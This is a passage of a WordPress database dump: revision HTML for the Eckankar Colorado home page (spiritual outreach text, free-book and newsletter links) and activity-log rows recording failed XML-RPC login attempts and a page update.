class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236947,40273,'post_new_post_content','<div>\r\n<code><?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg></code>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213675,35155,'_message_key','user_unknown_login_failed'),(213676,35155,'_xmlrpc_request','true'),(213677,35155,'_server_remote_addr','74.249.244.x'),(213678,35156,'failed_username','jonbarratt'),(213679,35156,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(213680,35156,'_message_key','user_unknown_login_failed'),(213681,35156,'_xmlrpc_request','true'),(213682,35156,'_server_remote_addr','74.249.244.x'),(213683,35157,'failed_username','jonbarratt'),(213684,35157,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(213685,35157,'_message_key','user_unknown_login_failed'),(213686,35157,'_xmlrpc_request','true'),(213687,35157,'_server_remote_addr','74.249.244.x'),(213688,35158,'failed_username','admin'),(213689,35158,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(213690,35158,'_message_key','user_unknown_login_failed'),(213691,35158,'_xmlrpc_request','true'),(213692,35158,'_server_remote_addr','74.249.245.x'),(236937,40272,'_message_key','post_updated'),(236938,40272,'_user_id','2'),(236939,40272,'_user_login','S8zhaBda'),(236940,40272,'_user_email','nada@zipnadanot.org'),(236941,40272,'_server_remote_addr','76.130.120.x'),(236942,40272,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236943,40273,'post_id','7160'),(236944,40273,'post_type','page'),(236945,40273,'post_title','Home'),(236946,40273,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -135px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 